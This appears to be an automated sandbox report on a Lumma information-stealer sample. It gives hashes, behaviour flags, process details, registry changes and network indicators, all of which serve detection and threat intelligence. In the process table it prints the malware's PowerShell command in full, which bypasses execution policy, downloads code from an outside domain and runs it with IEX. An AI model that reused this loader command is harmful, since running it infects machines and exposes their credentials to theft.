File name:

payload_executable.bin

Full analysis: https://app.any.run/tasks/1147c4ba-5f22-4635-b6c0-106ba48fa2b4
Verdict: Malicious activity
Threats:

Lumma is an information stealer, developed using the C programming language. It is offered for sale as a malware-as-a-service, with several plans available. It usually targets cryptocurrency wallets, login credentials, and other sensitive information on a compromised system. The malicious software regularly gets updates that improve and expand its functionality, making it a serious stealer threat.

Analysis date: January 10, 2025, 20:59:13
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
lumma
stealer
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5:

A0F063B82CE5A44ABA075F17B9284BAB

SHA1:

E1C46FB92FF3827347C47362511CCB0B1B09F123

SHA256:

0567B98365F8F5E5A3ADF508DC7234EA7B50270A8106C3A66A0DA96F38058118

SSDEEP:

49152:Bk8o4yc+e3i+FqWXbLYG8CjBG7ls/AsYfh2MKUaq9oxk4374lMv9vf5oPEeTS9+N:5oPcdqWrsGJj07lsYsYJ2MKUNjW7wM9y

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • payload_executable.bin.exe (PID: 6332)
      • payload_executable.bin.exe (PID: 6432)
    • LUMMA mutex has been found

      • payload_executable.bin.exe (PID: 6432)
    • Steals credentials from Web Browsers

      • payload_executable.bin.exe (PID: 6432)
    • LUMMA has been detected (YARA)

      • payload_executable.bin.exe (PID: 6432)
    • Actions looks like stealing of personal data

      • payload_executable.bin.exe (PID: 6432)
    • Changes powershell execution policy (Bypass)

      • payload_executable.bin.exe (PID: 6432)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 2380)
  • SUSPICIOUS

    • Executes application which crashes

      • payload_executable.bin.exe (PID: 6432)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 2380)
    • Found IP address in command line

      • powershell.exe (PID: 2380)
    • Possibly malicious use of IEX has been detected

      • payload_executable.bin.exe (PID: 6432)
    • Starts POWERSHELL.EXE for commands execution

      • payload_executable.bin.exe (PID: 6432)
    • Manipulates environment variables

      • powershell.exe (PID: 2380)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 2380)
  • INFO

    • Manual execution by a user

      • payload_executable.bin.exe (PID: 6432)
    • Checks supported languages

      • payload_executable.bin.exe (PID: 6332)
      • payload_executable.bin.exe (PID: 6432)
    • Reads the machine GUID from the registry

      • payload_executable.bin.exe (PID: 6332)
    • Reads the computer name

      • payload_executable.bin.exe (PID: 6332)
      • payload_executable.bin.exe (PID: 6432)
    • Reads the software policy settings

      • payload_executable.bin.exe (PID: 6432)
      • WerFault.exe (PID: 5592)
      • powershell.exe (PID: 2380)
    • Disables trace logs

      • powershell.exe (PID: 2380)
    • Checks proxy server information

      • powershell.exe (PID: 2380)
      • WerFault.exe (PID: 5592)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 2380)
    • Create files in a temporary directory

      • powershell.exe (PID: 2380)
    • Creates files or folders in the user directory

      • WerFault.exe (PID: 5592)
    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 2380)
    • The process uses the downloaded file

      • powershell.exe (PID: 2380)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

AssemblyVersion: 1.0.0.0
ProductVersion: 1.0.0.0
ProductName: x
OriginalFileName: x.exe
LegalTrademarks: -
LegalCopyright: Copyright © 2017
InternalName: x.exe
FileVersion: 1.0.0.0
FileDescription: x
CompanyName: -
Comments: -
CharacterSet: Unicode
LanguageCode: Neutral
FileSubtype: -
ObjectFileType: Executable application
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x003f
ProductVersionNumber: 1.0.0.0
FileVersionNumber: 1.0.0.0
Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: -
OSVersion: 4
EntryPoint: 0x156a8e
UninitializedDataSize: -
InitializedDataSize: 2048
CodeSize: 1395712
LinkerVersion: 8
PEType: PE32
ImageFileCharacteristics: Executable, 32-bit
TimeStamp: 2025:01:08 09:10:43+00:00
MachineType: Intel 386 or later, and compatibles
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
154
Monitored processes
8
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start svchost.exe payload_executable.bin.exe no specs #LUMMA payload_executable.bin.exe powershell.exe no specs conhost.exe no specs werfault.exe ucpdmgr.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
6332"C:\Users\admin\Desktop\payload_executable.bin.exe" C:\Users\admin\Desktop\payload_executable.bin.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
x
Exit code:
4294967295
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\payload_executable.bin.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
6432"C:\Users\admin\Desktop\payload_executable.bin.exe"C:\Users\admin\Desktop\payload_executable.bin.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
x
Exit code:
3221226356
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\payload_executable.bin.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shell32.dll
2380powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; fq4nC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepayload_executable.bin.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
3732\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5592C:\WINDOWS\SysWOW64\WerFault.exe -u -p 6432 -s 900C:\Windows\SysWOW64\WerFault.exe
payload_executable.bin.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
2076"C:\WINDOWS\system32\UCPDMgr.exe"C:\Windows\System32\UCPDMgr.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
User Choice Protection Manager
Exit code:
0
Version:
1.0.0.414301
Modules
Images
c:\windows\system32\ucpdmgr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
6920\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeUCPDMgr.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
11 469
Read events
11 455
Write events
14
Delete events
0

Modification events

(PID) Process:(2380) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2380) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2380) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(2380) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(2380) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(2380) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(2380) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(2380) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(2380) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(2380) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
0
Suspicious files
7
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
5592WerFault.exeC:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_payload_executab_f4274b95f4c46081e6c9815ba511d322859cad25_80d07f40_c15883e5-d110-49f3-b373-7e0d18c1ae38\Report.wer
MD5:
SHA256:
5592WerFault.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\37C951188967C8EB88D99893D9D191FEbinary
MD5:16B4AACD42EDF8A0EC73741D16714BD9
SHA256:E3A9CF064867231ADDBACFDBCC689009E8AB2B0845988F91E8338D14D7132EA6
5592WerFault.exeC:\Users\admin\AppData\Local\CrashDumps\payload_executable.bin.exe.6432.dmpbinary
MD5:388DEF8E0F2C898A93C2D6E9EFE7D5EE
SHA256:5097B3E37A3C1D7169CFEAEC3CA2D9786B9EA325C4CA5D7621617277E7262CE6
5592WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WERE10D.tmp.WERInternalMetadata.xmlxml
MD5:A4D78B91A8B206BE1663FB83FFDED0C0
SHA256:BE42AFC9793C4AE0C014B40666EFFE6C37D9CEEB6D917A207EA2E42CC0F66404
5592WerFault.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\21253908F3CB05D51B1C2DA8B681A785binary
MD5:F6F53CD09A41E968C363419B279D3112
SHA256:6D2BB01CC7A9BADE2113B219CAC1BDA86B2733196B7E1BD0C807CE1E396B1892
5592WerFault.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\37C951188967C8EB88D99893D9D191FEbinary
MD5:FA84E4BCC92AA5DB735AB50711040CDE
SHA256:6D7205E794FDE4219A62D9692ECDDF612663A5CF20399E79BE87B851FCA4CA33
5592WerFault.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\21253908F3CB05D51B1C2DA8B681A785binary
MD5:D1F2F5562E04642366FF3D824E066316
SHA256:143C1403A6F4DDFAC14AF3A781292D7D54287F8E7406F699091959B5FC32C083
2380powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kftxjtrw.iv0.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2380powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_do4nrxlt.h03.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2380powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_f1zdmio5.r02.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
68
DNS requests
40
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
3920
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5592
WerFault.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
7132
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5592
WerFault.exe
GET
200
2.16.241.19:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.16.241.19:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1448
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
7132
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
4
System
192.168.100.255:138
whitelisted
4712
MoUsoCoreWorker.exe
2.16.241.19:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
1176
svchost.exe
20.190.159.23:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3508
svchost.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
unknown
1176
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
5064
SearchApp.exe
2.23.227.215:443
www.bing.com
Ooredoo Q.S.C.
QA
whitelisted
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
1076
svchost.exe
2.23.242.9:443
go.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.241.19
  • 2.16.241.12
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 2.23.246.101
whitelisted
google.com
  • 142.250.186.174
whitelisted
login.live.com
  • 20.190.159.23
  • 20.190.159.2
  • 40.126.31.69
  • 20.190.159.75
  • 40.126.31.71
  • 20.190.159.71
  • 20.190.159.68
  • 20.190.159.64
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
www.bing.com
  • 2.23.227.215
  • 2.23.227.208
whitelisted
go.microsoft.com
  • 2.23.242.9
whitelisted
charminammoc.cyou
unknown
soundtappysk.shop
malicious
femalsabler.shop
malicious

Threats

No threats detected
No debug info